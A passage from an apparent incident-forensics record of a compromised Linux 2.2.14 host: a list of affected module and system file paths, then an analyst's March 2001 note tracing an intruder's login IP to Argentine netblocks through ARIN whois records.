/lib/modules/2.2.14-5.0/net/3c503.o /lib/modules/2.2.14-5.0/net/3c505.o /lib/modules/2.2.14-5.0/net/3c507.o /lib/modules/2.2.14-5.0/net/3c509.o /lib/modules/2.2.14-5.0/net/3c515.o /lib/modules/2.2.14-5.0/net/3c59x.o /lib/modules/2.2.14-5.0/net/3c90x.o /lib/modules/2.2.14-5.0/net/82596.o /lib/modules/2.2.14-5.0/net/8390.o /lib/modules/2.2.14-5.0/net/ac3200.o /lib/modules/2.2.14-5.0/net/acenic.o /lib/modules/2.2.14-5.0/net/arlan-proc.o /lib/modules/2.2.14-5.0/net/arlan.o /lib/modules/2.2.14-5.0/net/at1700.o /lib/modules/2.2.14-5.0/net/bonding.o /lib/modules/2.2.14-5.0/net/bsd_comp.o /lib/modules/2.2.14-5.0/net/cosa.o /lib/modules/2.2.14-5.0/net/cs89x0.o /lib/modules/2.2.14-5.0/net/de4x5.o /lib/modules/2.2.14-5.0/net/de600.o /lib/modules/2.2.14-5.0/net/de620.o /lib/modules/2.2.14-5.0/net/depca.o /lib/modules/2.2.14-5.0/net/dgrs.o /lib/modules/2.2.14-5.0/net/dlci.o /lib/modules/2.2.14-5.0/net/dmfe.o /lib/modules/2.2.14-5.0/net/dummy.o /lib/modules/2.2.14-5.0/net/e2100.o /lib/modules/2.2.14-5.0/net/eepro.o /lib/modules/2.2.14-5.0/net/eepro100.o /lib/modules/2.2.14-5.0/net/eexpress.o /lib/modules/2.2.14-5.0/net/epic100.o /lib/modules/2.2.14-5.0/net/eql.o /lib/modules/2.2.14-5.0/net/es3210.o /lib/modules/2.2.14-5.0/net/eth16i.o /lib/modules/2.2.14-5.0/net/ethertap.o /lib/modules/2.2.14-5.0/net/ewrk3.o /lib/modules/2.2.14-5.0/net/fmv18x.o /lib/modules/2.2.14-5.0/net/hostess_sv11.o /lib/modules/2.2.14-5.0/net/hp-plus.o /lib/modules/2.2.14-5.0/net/hp.o /lib/modules/2.2.14-5.0/net/hp100.o /lib/modules/2.2.14-5.0/net/ibmtr.o /lib/modules/2.2.14-5.0/net/ircomm.o /lib/modules/2.2.14-5.0/net/irda.o /lib/modules/2.2.14-5.0/net/irda_deflate.o /lib/modules/2.2.14-5.0/net/irlan.o /lib/modules/2.2.14-5.0/net/lance.o /lib/modules/2.2.14-5.0/net/lne390.o /lib/modules/2.2.14-5.0/net/ne.o /lib/modules/2.2.14-5.0/net/ne2k-pci.o /lib/modules/2.2.14-5.0/net/ne3210.o /lib/modules/2.2.14-5.0/net/ni5010.o /lib/modules/2.2.14-5.0/net/ni52.o /lib/modules/2.2.14-5.0/net/ni65.o /lib/modules/2.2.14-5.0/net/old_tulip.o /lib/modules/2.2.14-5.0/net/olympic.o /lib/modules/2.2.14-5.0/net/pcnet32.o /lib/modules/2.2.14-5.0/net/plip.o /lib/modules/2.2.14-5.0/net/ppp.o /lib/modules/2.2.14-5.0/net/ppp_deflate.o /lib/modules/2.2.14-5.0/net/rcpci.o /lib/modules/2.2.14-5.0/net/rtl8139.o /lib/modules/2.2.14-5.0/net/sb1000.o /lib/modules/2.2.14-5.0/net/sbni.o /lib/modules/2.2.14-5.0/net/sdla.o /lib/modules/2.2.14-5.0/net/sdladrv.o /lib/modules/2.2.14-5.0/net/sealevel.o /lib/modules/2.2.14-5.0/net/shaper.o /lib/modules/2.2.14-5.0/net/sis900.o /lib/modules/2.2.14-5.0/net/sk98lin.o /lib/modules/2.2.14-5.0/net/sktr.o /lib/modules/2.2.14-5.0/net/slhc.o /lib/modules/2.2.14-5.0/net/slip.o /lib/modules/2.2.14-5.0/net/smc-ultra.o /lib/modules/2.2.14-5.0/net/smc-ultra32.o /lib/modules/2.2.14-5.0/net/smc9194.o /lib/modules/2.2.14-5.0/net/strip.o /lib/modules/2.2.14-5.0/net/syncppp.o /lib/modules/2.2.14-5.0/net/tlan.o /lib/modules/2.2.14-5.0/net/tulip.o /lib/modules/2.2.14-5.0/net/via-rhine.o /lib/modules/2.2.14-5.0/net/wanpipe.o /lib/modules/2.2.14-5.0/net/wavelan.o /lib/modules/2.2.14-5.0/net/wd.o /lib/modules/2.2.14-5.0/net/yellowfin.o /lib/modules/2.2.14-5.0/net/z85230.o /lib/modules/2.2.14-5.0/scsi/53c7,8xx.o /lib/modules/2.2.14-5.0/scsi/AM53C974.o /lib/modules/2.2.14-5.0/scsi/BusLogic.o /lib/modules/2.2.14-5.0/scsi/NCR53c406a.o /lib/modules/2.2.14-5.0/scsi/a100u2w.o /lib/modules/2.2.14-5.0/scsi/advansys.o /lib/modules/2.2.14-5.0/scsi/aha152x.o /lib/modules/2.2.14-5.0/scsi/aha1542.o /lib/modules/2.2.14-5.0/scsi/aha1740.o /lib/modules/2.2.14-5.0/scsi/aic7xxx.o /lib/modules/2.2.14-5.0/scsi/atp870u.o /lib/modules/2.2.14-5.0/scsi/dtc.o /lib/modules/2.2.14-5.0/scsi/eata.o /lib/modules/2.2.14-5.0/scsi/eata_dma.o /lib/modules/2.2.14-5.0/scsi/eata_pio.o /lib/modules/2.2.14-5.0/scsi/fdomain.o /lib/modules/2.2.14-5.0/scsi/g_NCR5380.o /lib/modules/2.2.14-5.0/scsi/gdth.o /lib/modules/2.2.14-5.0/scsi/ide-scsi.o /lib/modules/2.2.14-5.0/scsi/imm.o /lib/modules/2.2.14-5.0/scsi/in2000.o /lib/modules/2.2.14-5.0/scsi/initio.o /lib/modules/2.2.14-5.0/scsi/ips.o /lib/modules/2.2.14-5.0/scsi/megaraid.o /lib/modules/2.2.14-5.0/scsi/ncr53c8xx.o /lib/modules/2.2.14-5.0/scsi/pas16.o /lib/modules/2.2.14-5.0/scsi/pci2000.o /lib/modules/2.2.14-5.0/scsi/pci2220i.o /lib/modules/2.2.14-5.0/scsi/ppa.o /lib/modules/2.2.14-5.0/scsi/psi240i.o /lib/modules/2.2.14-5.0/scsi/qlogicfas.o /lib/modules/2.2.14-5.0/scsi/qlogicfc.o /lib/modules/2.2.14-5.0/scsi/qlogicisp.o /lib/modules/2.2.14-5.0/scsi/scsi_debug.o /lib/modules/2.2.14-5.0/scsi/seagate.o /lib/modules/2.2.14-5.0/scsi/sg.o /lib/modules/2.2.14-5.0/scsi/sim710.o /lib/modules/2.2.14-5.0/scsi/st.o /lib/modules/2.2.14-5.0/scsi/sym53c416.o /lib/modules/2.2.14-5.0/scsi/sym53c8xx.o /lib/modules/2.2.14-5.0/scsi/t128.o /lib/modules/2.2.14-5.0/scsi/tmscsim.o /lib/modules/2.2.14-5.0/scsi/u14-34f.o /lib/modules/2.2.14-5.0/scsi/ultrastor.o /lib/modules/2.2.14-5.0/scsi/wd7000.o /lib/modules/2.2.14-5.0/video/matroxfb.o /lib/modules/2.2.14-5.0/video/mdacon.o /usr/X11R6/lib/X11/fonts/misc/fonts.dir /usr/doc/libtool-1.3.4/demo/Makefile.in /usr/doc/libtool-1.3.4/demo/aclocal.m4 /usr/lib/umb-scheme/slibcat /usr/share/fonts/ISO8859-2/100dpi/fonts.dir /usr/share/fonts/ISO8859-2/75dpi/fonts.dir /usr/share/fonts/ISO8859-7/100dpi/fonts.dir /usr/share/fonts/ISO8859-7/75dpi/fonts.dir /usr/share/fonts/fontmap /usr/share/texmf/ls-R /usr/src/linux-2.2.14/Documentation/Configure.help /usr/src/linux-2.2.14/arch/i386/defconfig /usr/src/linux-2.2.14/drivers/scsi/.depend /usr/src/linux-2.2.14/drivers/sound/.depend /usr/src/linux-2.2.14/include/linux/autoconf.h /usr/src/linux-2.2.14/net/Config.in /usr/src/linux-2.2.14/net/Makefile /usr/src/linux-2.2.14/net/ipv4/.depend /usr/src/linux-2.2.14/net/ipv4/af_inet.c /var/log/lastlog /var/log/sendmail.st ========================================================================== Date: Tue, Mar 6 2001 19:55:04 Comments added by wes The IP address in /var/log/wtmp that was connecting as the user sdr is: 200.51.210.75 ##################### According to ARIN: TELINTAR UOS (NETBLK-TELINTAR-UOS4-AR) TELINTAR-UOS4-AR 200.51.0.0 - 200.51.255.255 Advance Telecomunicaciones S.A. (NETBLK-ADVANCE-INTERACTIV-AR) ADVANCE-INTERACTIV-AR 200.51.208.0 - 200.51.217.255 ######################### And Telintar: TELINTAR UOS (NETBLK-TELINTAR-UOS4-AR) Tucuman 1 4th floor Buenos Aires, Capital Federal 1001 AR Netname: TELINTAR-UOS4-AR Netblock: 200.51.0.0 - 200.51.255.255 Maintainer: TLAR Coordinator: Tld, Poc (PT92-ARIN) noc@telintar.net.ar 54-11-4370-1555 (FAX) 54-11-4373-9341 Domain System inverse mapping provided by: VENUS.SUR.TELINTAR.COM.AR 200.0.193.100 XANADU.SUR.TELINTAR.COM.AR 200.0.193.98 ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE Record last updated on 24-Feb-2000. Database last updated on 6-Mar-2001 19:02:59 EDT. ############################# And Advance Telecommunications: Advance Telecomunicaciones S.A. (NETBLK-ADVANCE-INTERACTIV-AR) Tucuman 1,Piso 8 Buenos Aires, Buenos Aires AR Netname: ADVANCE-INTERACTIV-AR Netblock: 200.51.208.0 - 200.51.217.255 Maintainer: AVTC Coordinator: Tld, Poc (PT92-ARIN) noc@telintar.net.ar 54-11-4370-1555 (FAX) 54-11-4373-9341 Domain System inverse mapping provided by: DNS1.INTERNET-MRSE-SOLUTIONS.COM 200.51.254.254 DNS2.INTERNET-MRSE-SOLUTIONS.COM 200.51.254.251 Record last updated on 17-Nov-2000. Database last updated on 6-Mar-2001 19:02:59 EDT.